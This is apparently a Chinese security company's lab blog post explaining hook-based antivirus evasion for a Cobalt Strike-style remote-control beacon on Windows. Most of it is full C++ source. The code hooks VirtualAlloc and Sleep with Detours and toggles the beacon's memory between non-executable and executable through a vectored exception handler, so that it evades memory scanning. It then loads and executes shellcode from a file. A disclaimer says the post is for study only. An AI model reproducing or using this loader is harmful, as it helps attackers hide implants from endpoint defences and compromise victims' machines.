咨询服务热线

400-6446-808

创安实验室专栏
您的当前位置:首页 > 创安实验室专栏
创安实验室专栏丨windows基于hook的远控免杀
发布者:创信华通  发布时间:2022-11-04  浏览量:279次











古语有云:“学如逆水行舟,不进则退。”面对如今随时都在变化的网络安全环境更是如此。为此,创信华通微信公众号特开设“创安实验室专栏”,以记录创信华通创安实验室在技术上的探索,加强同行间的交流,相互学习,共同进步。


+

+

windows基于hook的远控免杀

HOOK的概念

钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。其实就是改变程序执行流程的一种技术的统称。

免杀实现

int main()

{

hEvent = CreateEvent(NULL, TRUE, false, NULL);//创建一个命名的或无名的事件对象

AddVectoredExceptionHandler(1, &FirstVectExcepHandler);//注册向量异常处理程序,并返回异常处理程序的句柄

Hook(); //开始hook

HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);//创建线程,指向线程函数的地址Beacon_set_Memory_attributes

CloseHandle(hThread1);//关闭线程

unsigned char* BinData = NULL;

size_t size = 0;

char* szFilePath = ".\\test.bin";  

BinData = ReadBinaryFile(szFilePath, &size);

shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);//申请内存空间,返回首地址

memcpy(shellcode_addr, BinData, size);//从存储区 BinData复制 size个字节到存储区 shellcode_addr

VirtualProtect(shellcode_addr,   size,   PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//将shellcode_addr所在内存区域设置为可执行模式

(*(int(*)()) shellcode_addr)(); //执行shellcode

UnHook();//结束hook

return 0;

}

主要函数

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter):用于设置shellcode区域的不可执行模式

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo):用于恢复shellcode区域的可执行模式

unsigned char* ReadBinaryFile(char* szFilePath, size_t* size):用于读取二进制文件

void Hook():HOOK

void UnHook():接触HOOK

void WINAPI NewSleep(DWORD dwMilliseconds):显示cs的sleep时间

LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect):用于分配内存地址和大小

设置Beacon_address所在内存区域设置为可执行模式

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)

{

printf("FirstVectExcepHandler\n");

printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);

//printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);

if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005)

{

printf("恢复Beacon内存属性\n");

VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//设置Beacon_address所在内存区域设置为可执行模式

return EXCEPTION_CONTINUE_EXECUTION;

}

return EXCEPTION_CONTINUE_SEARCH;

}

将shellcode_addr所在内存区域设置为不可执行模式

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)

{

printf("Beacon_set_Memory_attributes启动\n");

while (true)

{

    WaitForSingleObject(hEvent, INFINITE);//检测hEvent事件的信号状态,INFINITE表示函数将仅在对象收到信号时返回

    printf("设置Beacon内存属性不可执行\n");

    VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);//将shellcode_addr所在内存区域设置为不可执行模式

    ResetEvent(hEvent); //设置事件hEvent为无信号状态

}

return 0;

}

静态免杀效果

动态免杀效果

完整代码

#include "pch.h"

#include 

#include

#include 

#include "detours.h"

#include "detver.h"

#pragma comment(lib,"detours.lib")

 

LPVOID Beacon_address;

SIZE_T Beacon_data_len;

DWORD Beacon_Memory_address_flOldProtect;

HANDLE hEvent;

 

 

BOOL Vir_FLAG = TRUE;

LPVOID shellcode_addr;

 

 

static LPVOID(WINAPI* OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;

 

//分配内存地址和大小

LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {

Beacon_data_len = dwSize;

Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);

printf("分配大小:%d", Beacon_data_len);

printf("分配地址:%llx \n", Beacon_address);

return Beacon_address;

}

 

static VOID(WINAPI* OldSleep)(DWORD dwMilliseconds) = Sleep;

//设置新的sleep地址

void WINAPI NewSleep(DWORD dwMilliseconds)

{

if (Vir_FLAG)

{

   VirtualFree(shellcode_addr, 0, MEM_RELEASE);

    Vir_FLAG = false;

}

printf("sleep时间:%d\n", dwMilliseconds);

SetEvent(hEvent);

OldSleep(dwMilliseconds);

}

 

void Hook()

{

DetourRestoreAfterWith(); //避免重复HOOK

DetourTransactionBegin(); // 开始HOOK

DetourUpdateThread(GetCurrentThread());//列入一个在DetourTransaction过程中要进行update的线程,为了避免崩溃

DetourAttach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc); //多次调用DetourAttach,HOOK多个函数

DetourAttach((PVOID*)&OldSleep, NewSleep);

DetourTransactionCommit(); //  提交HOOK

}

 

void UnHook()

{

DetourTransactionBegin();//解除截获过程

DetourUpdateThread(GetCurrentThread());//列入一个在DetourTransaction过程中要进行update的线程,为了避免崩溃

DetourDetach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);//撤销对NewVirtualAlloc的hook

DetourTransactionCommit();//解除hook

}

 

size_t GetSize(char* szFilePath)

{

size_t size;

FILE* f = fopen(szFilePath, "rb");

fseek(f, 0, SEEK_END);

size = ftell(f);//ftell配合fseek计算出文件大小

rewind(f);

fclose(f);

return size;

}

 

unsigned char* ReadBinaryFile(char* szFilePath, size_t* size)

{

unsigned char* p = NULL;

FILE* f = NULL;

size_t res = 0;

*size = GetSize(szFilePath);

if (*size == 0) return NULL;

f = fopen(szFilePath, "rb");

if (f == NULL)

{

    printf("Binary file does not exists!\n");

    return 0;

}

p = new unsigned char[*size];

// Read file

rewind(f);

res = fread(p, sizeof(unsigned char), *size, f);

fclose(f);

if (res == 0)

{

    delete[] p;

    return NULL;

}

return p;

}

 

BOOL is_Exception(DWORD64 Exception_addr)

{

if (Exception_addr < ((DWORD64)Beacon_address + Beacon_data_len) && Exception_addr >(DWORD64)Beacon_address)

{

    printf("地址符合:%llx\n", Exception_addr);

    return true;

}

printf("地址不符合:%llx\n", Exception_addr);

return false;

}

 

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)

{

printf("FirstVectExcepHandler\n");

printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);

//printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);

if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005)

{

    printf("恢复Beacon内存属性\n");

   VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//设置Beacon_address所在内存区域设置为可执行模式

    return EXCEPTION_CONTINUE_EXECUTION;

}

return EXCEPTION_CONTINUE_SEARCH;

}

 

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)

{

printf("Beacon_set_Memory_attributes启动\n");

while (true)

{

   WaitForSingleObject(hEvent, INFINITE);//检测hEvent事件的信号状态,INFINITE表示函数将仅在对象收到信号时返回

    printf("设置Beacon内存属性不可执行\n");

   VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);//将shellcode_addr所在内存区域设置为不可执行模式

    ResetEvent(hEvent); //设置事件hEvent为无信号状态

}

return 0;

}

 

int main()

{

hEvent = CreateEvent(NULL, TRUE, false, NULL);//创建一个命名的或无名的事件对象

 

AddVectoredExceptionHandler(1, &FirstVectExcepHandler);//注册向量异常处理程序,并返回异常处理程序的句柄

Hook(); //开始hook

HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);//创建线程,指向线程函数的地址Beacon_set_Memory_attributes

CloseHandle(hThread1);//关闭线程

 

 

 

unsigned char* BinData = NULL;

size_t size = 0;

 

 

char* szFilePath = ".\\test.bin";  

BinData = ReadBinaryFile(szFilePath, &size);

shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);//申请内存空间,返回首地址

memcpy(shellcode_addr, BinData, size);//从存储区 BinData复制 size个字节到存储区 shellcode_addr

VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//将shellcode_addr所在内存区域设置为可执行模式

(*(int(*)()) shellcode_addr)(); //执行shellcode

UnHook();//结束hook

return 0;

}


E·N·D


本文由创信华通创安攻防实验室编辑。

本文仅限于个人学习和技术研究,由于传播、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者本人负责,本单位不为此承担任何责任。创安攻防实验室拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。


如有侵权,请联系后台。




创安攻防实验室

创安攻防实验室,是成都创信华通信息技术有限公司旗下的技术研究团队,成立于2021年9月,主要研究红蓝对抗、重大安全保障、应急响应等方向。

创安攻防实验室圆满完成了多次公安举办的重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。

创安攻防实验室秉承创信华通的发展理念,致力打造国内一流网络安全团队。